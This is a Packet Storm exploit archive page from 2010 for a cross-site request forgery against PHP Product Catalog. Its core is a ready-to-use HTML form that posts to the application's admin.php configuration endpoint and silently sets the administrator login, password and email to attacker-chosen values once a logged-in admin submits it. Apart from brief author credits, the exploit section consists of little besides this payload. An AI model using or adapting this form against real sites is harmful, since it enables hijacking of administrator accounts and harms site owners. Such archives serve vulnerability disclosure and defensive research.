exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Product Catalog Cross Site Request Forgery

PHP Product Catalog Cross Site Request Forgery
Posted Jan 29, 2010
Authored by bi0

PHP Product Catalog suffers from a cross site request forgery vulnerability.

tags | exploit, php, csrf
SHA-256 | 9769bffb52f222f91f048681493b1c29d48568c80a898eed4abdfaae45f40e72
Download | Favorite | View

PHP Product Catalog Cross Site Request Forgery

Change Mirror Download

# Title: PHP Product Catalog - [ CSRF ] Change Administrator Password
# Date: 28/1/2010
# Author: bi0
# Software Link: http://www.tantumweb.com
# CVE : () 

                ______     __     ______             
               /\  == \   /\ \   /\  __ \   
               \ \  __<   \ \ \  \ \ \/\ \  
                \ \_____\  \ \_\  \ \_____\ 
                 \/_____/   \/_/   \/_____/ 
                 
                 01000010 01101001 01001111      

[#]----------------------------------------------------------------[#]
# 
# [+] PHP Product Catalog - [ CSRF ] Change Administrator Password
#
#  // Author Info 
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com    
# [x] Thanks: Pig,packetdeath,redking,sp1r1t and all my friends 
# [x] IRC : irc.clickshqip.com / #itsecurity
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit : 
# 
# [ CSRF ] 
#      
#     [ Login ]
#     http://[server]/[path]/admin.php
# 
# // Start CSRF
|-------------------------------------------------------------------------------|

<html>
<form action="http://[server]/admin.php?p=otherConfig&sOption=save" method="POST">
Admin : <input type="text" name="login" value="admin" size="5" /><br>
Passwd  <input type="text" name="pass" value="123" size="5" /><br>
Email : <input type="text" name="email" value="test@example.com" size="16" /><br>
<input type="submit" name="save" value="Save">
</form>
</html>

|-------------------------------------------------------------------------------|
# // End of attack 
#
[#]------------------------------------------------------------------------------------------[#]

#EOF                 
_________________________________________________________________
Hotmail: Powerful Free email with security by Microsoft.
https://signup.live.com/signup.aspx?id=60969
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close